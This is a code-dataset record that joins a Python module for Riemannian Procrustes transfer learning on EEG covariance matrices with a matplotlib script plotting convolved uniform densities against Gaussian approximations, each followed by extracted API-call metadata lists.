'Merger', (['schema'], {}), '(schema)\n', (3085, 3093), False, 'from ocdsmerge import CompiledRelease, Merger, VersionedRelease\n'), ((3385, 3403), 'copy.deepcopy', 'deepcopy', (['releases'], {}), '(releases)\n', (3393, 3403), False, 'from copy import deepcopy\n'), ((6157, 6171), 'copy.deepcopy', 'deepcopy', (['data'], {}), '(data)\n', (6165, 6171), False, 'from copy import deepcopy\n'), ((6187, 6203), 'copy.deepcopy', 'deepcopy', (['output'], {}), '(output)\n', (6195, 6203), False, 'from copy import deepcopy\n'), ((7257, 7271), 'copy.deepcopy', 'deepcopy', (['data'], {}), '(data)\n', (7265, 7271), False, 'from copy import deepcopy\n'), ((7287, 7303), 'copy.deepcopy', 'deepcopy', (['output'], {}), '(output)\n', (7295, 7303), False, 'from copy import deepcopy\n'), ((1761, 1775), 'copy.deepcopy', 'deepcopy', (['data'], {}), '(data)\n', (1769, 1775), False, 'from copy import deepcopy\n'), ((2206, 2220), 'copy.deepcopy', 'deepcopy', (['data'], {}), '(data)\n', (2214, 2220), False, 'from copy import deepcopy\n'), ((2643, 2666), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (2656, 2666), False, 'import pytest\n'), ((3254, 3266), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3263, 3266), False, 'import json\n'), ((3356, 3368), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3365, 3368), False, 'import json\n'), ((3552, 3570), 'json.dumps', 'json.dumps', (['actual'], {}), '(actual)\n', (3562, 3570), False, 'import json\n'), ((5076, 5112), 'pytest.raises', 'pytest.raises', (['InconsistentTypeError'], {}), '(InconsistentTypeError)\n', (5089, 5112), False, 'import pytest\n'), ((1490, 1510), 'pytest.raises', 'pytest.raises', (['error'], {}), '(error)\n', (1503, 1510), False, 'import pytest\n'), ((1654, 1674), 'pytest.raises', 'pytest.raises', (['error'], {}), '(error)\n', (1667, 1674), False, 'import pytest\n'), ((2098, 2118), 'pytest.raises', 'pytest.raises', (['error'], {}), '(error)\n', (2111, 2118), False, 'import pytest\n'), ((3281, 3328), 're.sub', 're.sub', (['"""-(?:compiled|versioned)"""', '""""""', 'filename'], {}), "('-(?:compiled|versioned)', '', filename)\n", (3287, 3328), False, 'import re\n'), ((7567, 7596), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (7580, 7596), False, 'import pytest\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 23 15:57:12 2018
@author: coelhorp
"""
import numpy as np
from sklearn.metrics import roc_auc_score
from rpa.helpers.transfer_learning.utils import transform_org2rct, transform_rct2str, transform_rct2rot
from rpa.helpers.transfer_learning.utils import transform_org2rct_p300, transform_rct2rot_p300
from rpa.helpers.transfer_learning.utils import get_sourcetarget_split_motorimagery, get_sourcetarget_split_p300
def RPA_recenter(source, target_train, target_test, paradigm='MI', weight_samples=False):
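    # RPA step 1 (re-center): translate source and target so their mean covariance matrices coincide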
if paradigm == 'P300':
return transform_org2rct_p300(source, target_train, target_test, weight_samples)
else:
return transform_org2rct(source, target_train, target_test)
def RPA_stretch(source, target_train, target_test, paradigm='MI'):
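    # RPA step 2 (stretch): rescale the target's dispersion around the mean to match the source's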
return transform_rct2str(source, target_train, target_test)
def RPA_rotate(source, target_train, target_test, paradigm='MI', class_weights=None, distance='euc'):
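    # RPA step 3 (rotate): rotate the target so its class means align with those of the source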
if paradigm == 'P300':
return transform_rct2rot_p300(source, target_train, target_test, class_weights, distance)
else:
return transform_rct2rot(source, target_train, target_test, class_weights, distance)
def get_sourcetarget_split(source, target, ncovs_train, paradigm='MI'):
    if paradigm == 'P300':
return get_sourcetarget_split_p300(source, target, ncovs_train)
else:
return get_sourcetarget_split_motorimagery(source, target, ncovs_train)
def get_score_notransfer(clf, target_train, target_test, paradigm='MI'):
covs_train = target_train['covs']
y_train = target_train['labels']
covs_test = target_test['covs']
y_test = target_test['labels']
clf.fit(covs_train, y_train)
y_pred = clf.predict(covs_test)
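    # binarize the labels one-vs-rest so roc_auc_score also handles multiclass problems
    # (the same conversion is repeated in get_score_transferlearning below)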
y_test = np.array([y_test == i for i in np.unique(y_test)]).T
y_pred = np.array([y_pred == i for i in np.unique(y_pred)]).T
return roc_auc_score(y_test, y_pred)
def get_score_transferlearning(clf, source, target_train, target_test, paradigm='MI'):
covs_source, y_source = source['covs'], source['labels']
covs_target_train, y_target_train = target_train['covs'], target_train['labels']
covs_target_test, y_target_test = target_test['covs'], target_test['labels']
covs_train = np.concatenate([covs_source, covs_target_train])
y_train = np.concatenate([y_source, y_target_train])
clf.fit(covs_train, y_train)
covs_test = covs_target_test
y_test = y_target_test
y_pred = clf.predict(covs_test)
y_test = np.array([y_test == i for i in np.unique(y_test)]).T
y_pred = np.array([y_pred == i for i in np.unique(y_pred)]).T
return roc_auc_score(y_test, y_pred)
|
[
"rpa.helpers.transfer_learning.utils.get_sourcetarget_split_motorimagery",
"numpy.unique",
"rpa.helpers.transfer_learning.utils.transform_rct2rot",
"sklearn.metrics.roc_auc_score",
"rpa.helpers.transfer_learning.utils.get_sourcetarget_split_p300",
"rpa.helpers.transfer_learning.utils.transform_org2rct_p300",
"rpa.helpers.transfer_learning.utils.transform_rct2str",
"rpa.helpers.transfer_learning.utils.transform_rct2rot_p300",
"rpa.helpers.transfer_learning.utils.transform_org2rct",
"numpy.concatenate"
] |
[((849, 901), 'rpa.helpers.transfer_learning.utils.transform_rct2str', 'transform_rct2str', (['source', 'target_train', 'target_test'], {}), '(source, target_train, target_test)\n', (866, 901), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct, transform_rct2str, transform_rct2rot\n'), ((1934, 1963), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (1947, 1963), False, 'from sklearn.metrics import roc_auc_score\n'), ((2298, 2346), 'numpy.concatenate', 'np.concatenate', (['[covs_source, covs_target_train]'], {}), '([covs_source, covs_target_train])\n', (2312, 2346), True, 'import numpy as np\n'), ((2361, 2403), 'numpy.concatenate', 'np.concatenate', (['[y_source, y_target_train]'], {}), '([y_source, y_target_train])\n', (2375, 2403), True, 'import numpy as np\n'), ((2680, 2709), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (2693, 2709), False, 'from sklearn.metrics import roc_auc_score\n'), ((618, 691), 'rpa.helpers.transfer_learning.utils.transform_org2rct_p300', 'transform_org2rct_p300', (['source', 'target_train', 'target_test', 'weight_samples'], {}), '(source, target_train, target_test, weight_samples)\n', (640, 691), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct_p300, transform_rct2rot_p300\n'), ((717, 769), 'rpa.helpers.transfer_learning.utils.transform_org2rct', 'transform_org2rct', (['source', 'target_train', 'target_test'], {}), '(source, target_train, target_test)\n', (734, 769), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct, transform_rct2str, transform_rct2rot\n'), ((1047, 1133), 'rpa.helpers.transfer_learning.utils.transform_rct2rot_p300', 'transform_rct2rot_p300', (['source', 'target_train', 'target_test', 'class_weights', 'distance'], {}), '(source, target_train, target_test, class_weights,\n distance)\n', (1069, 1133), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct_p300, transform_rct2rot_p300\n'), ((1155, 1232), 'rpa.helpers.transfer_learning.utils.transform_rct2rot', 'transform_rct2rot', (['source', 'target_train', 'target_test', 'class_weights', 'distance'], {}), '(source, target_train, target_test, class_weights, distance)\n', (1172, 1232), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct, transform_rct2str, transform_rct2rot\n'), ((1350, 1406), 'rpa.helpers.transfer_learning.utils.get_sourcetarget_split_p300', 'get_sourcetarget_split_p300', (['source', 'target', 'ncovs_train'], {}), '(source, target, ncovs_train)\n', (1377, 1406), False, 'from rpa.helpers.transfer_learning.utils import get_sourcetarget_split_motorimagery, get_sourcetarget_split_p300\n'), ((1432, 1496), 'rpa.helpers.transfer_learning.utils.get_sourcetarget_split_motorimagery', 'get_sourcetarget_split_motorimagery', (['source', 'target', 'ncovs_train'], {}), '(source, target, ncovs_train)\n', (1467, 1496), False, 'from rpa.helpers.transfer_learning.utils import get_sourcetarget_split_motorimagery, get_sourcetarget_split_p300\n'), ((1834, 1851), 'numpy.unique', 'np.unique', (['y_test'], {}), '(y_test)\n', (1843, 1851), True, 'import numpy as np\n'), ((1900, 1917), 'numpy.unique', 'np.unique', (['y_pred'], {}), '(y_pred)\n', (1909, 1917), True, 'import numpy as np\n'), ((2580, 2597), 'numpy.unique', 'np.unique', (['y_test'], {}), '(y_test)\n', (2589, 2597), True, 'import numpy as np\n'), ((2646, 2663), 'numpy.unique', 'np.unique', (['y_pred'], {}), '(y_pred)\n', (2655, 2663), True, 'import numpy as np\n')]
|
import matplotlib.pyplot as plt
import numpy as np
import math
from scipy.stats import norm
from matplotlib import rc
__author__ = 'ernesto'
# whether to use latex or mathtext
rc('text', usetex=False)
rc('mathtext', fontset='cm')
# auxiliary function to get ticks of equal length on the x and y axes despite their different scales.
def convert_display_to_data_coordinates(transData, length=10):
# create a transform which will take from display to data coordinates
inv = transData.inverted()
# transform from display coordinates to data coordinates in x axis
data_coords = inv.transform([(0, 0), (length, 0)])
# get the length of the segment in data units
yticks_len = data_coords[1, 0] - data_coords[0, 0]
# transform from display coordinates to data coordinates in y axis
data_coords = inv.transform([(0, 0), (0, length)])
# get the length of the segment in data units
xticks_len = data_coords[1, 1] - data_coords[0, 1]
return xticks_len, yticks_len
#####################################
# PARAMETERS - May be modified      #
#####################################
# uniform distribution on (0, T)
T = 0.5
# range of x of interest
xmin = -0.1
xmax = 3.5 * T
ymin = 0
ymax = 1 / T
#####################
# END OF PARAMETERS #
#####################
# parameters of the densities of x_i: mean and variance
eta = T / 2
var = (T ** 2) / 12
# number of random variables x_i to sum
na = 2
nb = 3
# mean and variance of the sum
eta2 = na * eta
var2 = na * var
eta3 = nb * eta
var3 = nb * var
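# sum of n i.i.d. U(0, T) variables: eta_n = n*T/2 and var_n = n*T^2/12,
# i.e. N(T, T^2/6) for n = 2 and N(3T/2, T^2/4) for n = 3, as in the legends below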
# theoretical pdf
x = np.linspace(xmin, xmax, 300)
f2 = norm.pdf(x, eta2, math.sqrt(var2))
f3 = norm.pdf(x, eta3, math.sqrt(var3))
# axis parameters
dx = 0.1
xmin_ax = xmin - dx
xmax_ax = xmax + 2 * dx
dy = 0.2
ymin_ax = ymin - dy
ymax_ax = ymax + 0.4
# figure parameters
# length of the ticks for all subplots (6 pixels)
display_length = 6 # in pixels
# x tick labels margin
xtm = -0.23
ytm = -0.07
# font size
fontsize = 14
fig = plt.figure(0, figsize=(10, 3), frameon=False)
ax = plt.subplot2grid((1, 6), (0, 0), rowspan=1, colspan=2)
plt.xlim(xmin_ax, xmax_ax)
plt.ylim(ymin_ax, ymax_ax)
# axis arrows
plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
plt.annotate("", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
# f(x)
plt.plot([0, T], [1/T, 1/T], 'k', linewidth=2)
plt.plot([T, T], [0, 1/T], 'k', linewidth=2)
plt.plot([0, 0], [0, 1/T], 'k', linewidth=2)
plt.plot([xmin, 0], [0, 0], 'k', linewidth=2)
plt.plot([T, xmax], [0, 0], 'k', linewidth=2)
# labels
# x labels
plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')
plt.text(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')
plt.text(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')
# ylabels
plt.text(ytm, 1/T, '$\dfrac{1}{T}$', fontsize=fontsize, ha='right', va='center')
plt.text(-ytm, ymax_ax, '$f(x)$', fontsize=fontsize, ha='left', va='center')
plt.axis('off')
fig = plt.figure(0, figsize=(10, 3), frameon=False)
ax = plt.subplot2grid((1, 6), (0, 2), rowspan=1, colspan=2)
plt.xlim(xmin_ax, xmax_ax)
plt.ylim(ymin_ax, ymax_ax)
# horizontal and vertical ticks length
xtl, ytl = convert_display_to_data_coordinates(ax.transData, length=display_length)
# axis arrows
plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
plt.annotate("", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
# f2(x)
plt.plot([0, T], [0, 1/T], 'k', linewidth=2, label='$f(x)*f(x)$')
plt.plot([T, 2 * T], [1/T, 0], 'k', linewidth=2)
plt.plot([xmin, 0], [0, 0], 'k', linewidth=2)
plt.plot([2*T, xmax], [0, 0], 'k', linewidth=2)
# Gaussian approximation
plt.plot(x, f2, 'r', linewidth=2, zorder=0, label='$N\left(T,\,\dfrac{T^2}{6}\\right)$')
# ticks
plt.plot([T, T], [0, xtl], 'k')
plt.plot([2*T, 2*T], [0, xtl], 'k')
plt.plot([0, ytl], [1/T, 1/T], 'k')
# labels
# x labels
plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')
plt.text(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')
plt.text(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')
plt.text(2*T, xtm, '$2T$', fontsize=fontsize, ha='center', va='baseline')
# ylabels
plt.text(ytm, 1/T, '$\dfrac{1}{T}$', fontsize=fontsize, ha='right', va='center')
#plt.text(-ytm, ymax_ax, '$f_2(x)$', fontsize=fontsize, ha='left', va='center')
leg = plt.legend(loc=(0.45, 0.7), frameon=False, fontsize=12)
plt.axis('off')
fig = plt.figure(0, figsize=(10, 3), frameon=False)
ax = plt.subplot2grid((1, 6), (0, 4), rowspan=1, colspan=2)
plt.xlim(xmin_ax, xmax_ax)
plt.ylim(ymin_ax, ymax_ax)
# horizontal and vertical ticks length
xtl, ytl = convert_display_to_data_coordinates(ax.transData, length=display_length)
# axis arrows
plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
plt.annotate("", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
# f3(x)
c = 2 * (T ** 3)
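# piecewise quadratic density of the sum of three U(0, T) variables (scaled Irwin-Hall, n = 3);
# c = 2*T^3 normalizes the first piece x^2 / (2*T^3) on [0, T]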
xa = np.linspace(0, T, 100)
plt.plot(xa, np.polyval([1, 0, 0], xa) / c, 'k', linewidth=2, label='$f(x)*f(x)*f(x)$')
xa = np.linspace(T, 2 * T, 100)
plt.plot(xa, np.polyval([-2, 6 * T, -3 * (T ** 2)], xa) / c, 'k', linewidth=2)
xa = np.linspace(2 * T, 3 * T, 100)
plt.plot(xa, np.polyval([1, -6 * T, 9 * (T ** 2)], xa) / c, 'k', linewidth=2)
plt.plot([xmin, 0], [0, 0], 'k', linewidth=2)
plt.plot([3*T, xmax], [0, 0], 'k', linewidth=2)
# Gaussian approximation
plt.plot(x, f3, 'r', linewidth=2, zorder=0, label='$N\left(\dfrac{3T}{2},\,\dfrac{T^2}{4}\\right)$')
# ticks
plt.plot([T, T], [0, xtl], 'k')
plt.plot([2*T, 2*T], [0, xtl], 'k')
plt.plot([3*T, 3*T], [0, xtl], 'k')
plt.plot([0, ytl], [1/T, 1/T], 'k')
plt.plot([0, ytl], [1/(2*T), 1/(2*T)], 'k')
# labels
# x labels
plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')
plt.text(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')
plt.text(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')
plt.text(2*T, xtm, '$2T$', fontsize=fontsize, ha='center', va='baseline')
plt.text(3*T, xtm, '$3T$', fontsize=fontsize, ha='center', va='baseline')
# ylabels
plt.text(ytm, 1/T, '$\dfrac{1}{T}$', fontsize=fontsize, ha='right', va='center')
plt.text(ytm, 1/(2*T), '$\dfrac{1}{2T}$', fontsize=fontsize, ha='right', va='center')
#plt.text(-ytm, ymax_ax, '$f_3(x)$', fontsize=fontsize, ha='left', va='center')
leg = plt.legend(loc=(0.28, 0.7), frameon=False, fontsize=12)
plt.axis('off')
# save as eps image
plt.savefig('example_7_15.pdf', bbox_inches='tight')
plt.show()
|
[
"matplotlib.pyplot.xlim",
"matplotlib.rc",
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.ylim",
"math.sqrt",
"numpy.polyval",
"matplotlib.pyplot.subplot2grid",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.text",
"matplotlib.pyplot.figure",
"numpy.linspace",
"matplotlib.pyplot.savefig"
] |
[((171, 195), 'matplotlib.rc', 'rc', (['"""text"""'], {'usetex': '(False)'}), "('text', usetex=False)\n", (173, 195), False, 'from matplotlib import rc\n'), ((196, 224), 'matplotlib.rc', 'rc', (['"""mathtext"""'], {'fontset': '"""cm"""'}), "('mathtext', fontset='cm')\n", (198, 224), False, 'from matplotlib import rc\n'), ((1544, 1572), 'numpy.linspace', 'np.linspace', (['xmin', 'xmax', '(300)'], {}), '(xmin, xmax, 300)\n', (1555, 1572), True, 'import numpy as np\n'), ((1965, 2010), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {'figsize': '(10, 3)', 'frameon': '(False)'}), '(0, figsize=(10, 3), frameon=False)\n', (1975, 2010), True, 'import matplotlib.pyplot as plt\n'), ((2016, 2070), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(1, 6)', '(0, 0)'], {'rowspan': '(1)', 'colspan': '(2)'}), '((1, 6), (0, 0), rowspan=1, colspan=2)\n', (2032, 2070), True, 'import matplotlib.pyplot as plt\n'), ((2072, 2098), 'matplotlib.pyplot.xlim', 'plt.xlim', (['xmin_ax', 'xmax_ax'], {}), '(xmin_ax, xmax_ax)\n', (2080, 2098), True, 'import matplotlib.pyplot as plt\n'), ((2099, 2125), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ymin_ax', 'ymax_ax'], {}), '(ymin_ax, ymax_ax)\n', (2107, 2125), True, 'import matplotlib.pyplot as plt\n'), ((2533, 2583), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, T]', '[1 / T, 1 / T]', '"""k"""'], {'linewidth': '(2)'}), "([0, T], [1 / T, 1 / T], 'k', linewidth=2)\n", (2541, 2583), True, 'import matplotlib.pyplot as plt\n'), ((2580, 2626), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, T]', '[0, 1 / T]', '"""k"""'], {'linewidth': '(2)'}), "([T, T], [0, 1 / T], 'k', linewidth=2)\n", (2588, 2626), True, 'import matplotlib.pyplot as plt\n'), ((2625, 2671), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, 0]', '[0, 1 / T]', '"""k"""'], {'linewidth': '(2)'}), "([0, 0], [0, 1 / T], 'k', linewidth=2)\n", (2633, 2671), True, 'import matplotlib.pyplot as plt\n'), ((2670, 2715), 'matplotlib.pyplot.plot', 'plt.plot', (['[xmin, 0]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([xmin, 0], [0, 0], 'k', linewidth=2)\n", (2678, 2715), True, 'import matplotlib.pyplot as plt\n'), ((2716, 2761), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, xmax]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([T, xmax], [0, 0], 'k', linewidth=2)\n", (2724, 2761), True, 'import matplotlib.pyplot as plt\n'), ((2782, 2857), 'matplotlib.pyplot.text', 'plt.text', (['xmax_ax', 'xtm', '"""$x$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')\n", (2790, 2857), True, 'import matplotlib.pyplot as plt\n'), ((2858, 2928), 'matplotlib.pyplot.text', 'plt.text', (['T', 'xtm', '"""$T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')\n", (2866, 2928), True, 'import matplotlib.pyplot as plt\n'), ((2929, 3000), 'matplotlib.pyplot.text', 'plt.text', (['ytm', 'xtm', '"""$0$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')\n", (2937, 3000), True, 'import matplotlib.pyplot as plt\n'), ((3011, 3099), 'matplotlib.pyplot.text', 'plt.text', (['ytm', '(1 / T)', '"""$\\\\dfrac{1}{T}$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""center"""'}), "(ytm, 1 / T, '$\\\\dfrac{1}{T}$', fontsize=fontsize, ha='right', va=\n 'center')\n", (3019, 3099), True, 'import matplotlib.pyplot as plt\n'), ((3092, 3168), 'matplotlib.pyplot.text', 'plt.text', (['(-ytm)', 'ymax_ax', '"""$f(x)$"""'], {'fontsize': 'fontsize', 'ha': '"""left"""', 'va': '"""center"""'}), "(-ytm, ymax_ax, '$f(x)$', fontsize=fontsize, ha='left', va='center')\n", (3100, 3168), True, 'import matplotlib.pyplot as plt\n'), ((3170, 3185), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (3178, 3185), True, 'import matplotlib.pyplot as plt\n'), ((3194, 3239), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {'figsize': '(10, 3)', 'frameon': '(False)'}), '(0, figsize=(10, 3), frameon=False)\n', (3204, 3239), True, 'import matplotlib.pyplot as plt\n'), ((3245, 3299), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(1, 6)', '(0, 2)'], {'rowspan': '(1)', 'colspan': '(2)'}), '((1, 6), (0, 2), rowspan=1, colspan=2)\n', (3261, 3299), True, 'import matplotlib.pyplot as plt\n'), ((3301, 3327), 'matplotlib.pyplot.xlim', 'plt.xlim', (['xmin_ax', 'xmax_ax'], {}), '(xmin_ax, xmax_ax)\n', (3309, 3327), True, 'import matplotlib.pyplot as plt\n'), ((3328, 3354), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ymin_ax', 'ymax_ax'], {}), '(ymin_ax, ymax_ax)\n', (3336, 3354), True, 'import matplotlib.pyplot as plt\n'), ((3887, 3954), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, T]', '[0, 1 / T]', '"""k"""'], {'linewidth': '(2)', 'label': '"""$f(x)*f(x)$"""'}), "([0, T], [0, 1 / T], 'k', linewidth=2, label='$f(x)*f(x)$')\n", (3895, 3954), True, 'import matplotlib.pyplot as plt\n'), ((3953, 4003), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, 2 * T]', '[1 / T, 0]', '"""k"""'], {'linewidth': '(2)'}), "([T, 2 * T], [1 / T, 0], 'k', linewidth=2)\n", (3961, 4003), True, 'import matplotlib.pyplot as plt\n'), ((4002, 4047), 'matplotlib.pyplot.plot', 'plt.plot', (['[xmin, 0]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([xmin, 0], [0, 0], 'k', linewidth=2)\n", (4010, 4047), True, 'import matplotlib.pyplot as plt\n'), ((4048, 4097), 'matplotlib.pyplot.plot', 'plt.plot', (['[2 * T, xmax]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([2 * T, xmax], [0, 0], 'k', linewidth=2)\n", (4056, 4097), True, 'import matplotlib.pyplot as plt\n'), ((4121, 4217), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'f2', '"""r"""'], {'linewidth': '(2)', 'zorder': '(0)', 'label': '"""$N\\\\left(T,\\\\,\\\\dfrac{T^2}{6}\\\\right)$"""'}), "(x, f2, 'r', linewidth=2, zorder=0, label=\n '$N\\\\left(T,\\\\,\\\\dfrac{T^2}{6}\\\\right)$')\n", (4129, 4217), True, 'import matplotlib.pyplot as plt\n'), ((4219, 4250), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, T]', '[0, xtl]', '"""k"""'], {}), "([T, T], [0, xtl], 'k')\n", (4227, 4250), True, 'import matplotlib.pyplot as plt\n'), ((4251, 4290), 'matplotlib.pyplot.plot', 'plt.plot', (['[2 * T, 2 * T]', '[0, xtl]', '"""k"""'], {}), "([2 * T, 2 * T], [0, xtl], 'k')\n", (4259, 4290), True, 'import matplotlib.pyplot as plt\n'), ((4287, 4326), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, ytl]', '[1 / T, 1 / T]', '"""k"""'], {}), "([0, ytl], [1 / T, 1 / T], 'k')\n", (4295, 4326), True, 'import matplotlib.pyplot as plt\n'), ((4343, 4418), 'matplotlib.pyplot.text', 'plt.text', (['xmax_ax', 'xtm', '"""$x$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')\n", (4351, 4418), True, 'import matplotlib.pyplot as plt\n'), ((4419, 4490), 'matplotlib.pyplot.text', 'plt.text', (['ytm', 'xtm', '"""$0$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')\n", (4427, 4490), True, 'import matplotlib.pyplot as plt\n'), ((4491, 4561), 'matplotlib.pyplot.text', 'plt.text', (['T', 'xtm', '"""$T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')\n", (4499, 4561), True, 'import matplotlib.pyplot as plt\n'), ((4562, 4637), 'matplotlib.pyplot.text', 'plt.text', (['(2 * T)', 'xtm', '"""$2T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(2 * T, xtm, '$2T$', fontsize=fontsize, ha='center', va='baseline')\n", (4570, 4637), True, 'import matplotlib.pyplot as plt\n'), ((4646, 4734), 'matplotlib.pyplot.text', 'plt.text', (['ytm', '(1 / T)', '"""$\\\\dfrac{1}{T}$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""center"""'}), "(ytm, 1 / T, '$\\\\dfrac{1}{T}$', fontsize=fontsize, ha='right', va=\n 'center')\n", (4654, 4734), True, 'import matplotlib.pyplot as plt\n'), ((4820, 4875), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(0.45, 0.7)', 'frameon': '(False)', 'fontsize': '(12)'}), '(loc=(0.45, 0.7), frameon=False, fontsize=12)\n', (4830, 4875), True, 'import matplotlib.pyplot as plt\n'), ((4877, 4892), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (4885, 4892), True, 'import matplotlib.pyplot as plt\n'), ((4901, 4946), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {'figsize': '(10, 3)', 'frameon': '(False)'}), '(0, figsize=(10, 3), frameon=False)\n', (4911, 4946), True, 'import matplotlib.pyplot as plt\n'), ((4952, 5006), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(1, 6)', '(0, 4)'], {'rowspan': '(1)', 'colspan': '(2)'}), '((1, 6), (0, 4), rowspan=1, colspan=2)\n', (4968, 5006), True, 'import matplotlib.pyplot as plt\n'), ((5008, 5034), 'matplotlib.pyplot.xlim', 'plt.xlim', (['xmin_ax', 'xmax_ax'], {}), '(xmin_ax, xmax_ax)\n', (5016, 5034), True, 'import matplotlib.pyplot as plt\n'), ((5035, 5061), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ymin_ax', 'ymax_ax'], {}), '(ymin_ax, ymax_ax)\n', (5043, 5061), True, 'import matplotlib.pyplot as plt\n'), ((5616, 5638), 'numpy.linspace', 'np.linspace', (['(0)', 'T', '(100)'], {}), '(0, T, 100)\n', (5627, 5638), True, 'import numpy as np\n'), ((5732, 5758), 'numpy.linspace', 'np.linspace', (['T', '(2 * T)', '(100)'], {}), '(T, 2 * T, 100)\n', (5743, 5758), True, 'import numpy as np\n'), ((5843, 5873), 'numpy.linspace', 'np.linspace', (['(2 * T)', '(3 * T)', '(100)'], {}), '(2 * T, 3 * T, 100)\n', (5854, 5873), True, 'import numpy as np\n'), ((5953, 5998), 'matplotlib.pyplot.plot', 'plt.plot', (['[xmin, 0]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([xmin, 0], [0, 0], 'k', linewidth=2)\n", (5961, 5998), True, 'import matplotlib.pyplot as plt\n'), ((5999, 6048), 'matplotlib.pyplot.plot', 'plt.plot', (['[3 * T, xmax]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([3 * T, xmax], [0, 0], 'k', linewidth=2)\n", (6007, 6048), True, 'import matplotlib.pyplot as plt\n'), ((6072, 6181), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'f3', '"""r"""'], {'linewidth': '(2)', 'zorder': '(0)', 'label': '"""$N\\\\left(\\\\dfrac{3T}{2},\\\\,\\\\dfrac{T^2}{4}\\\\right)$"""'}), "(x, f3, 'r', linewidth=2, zorder=0, label=\n '$N\\\\left(\\\\dfrac{3T}{2},\\\\,\\\\dfrac{T^2}{4}\\\\right)$')\n", (6080, 6181), True, 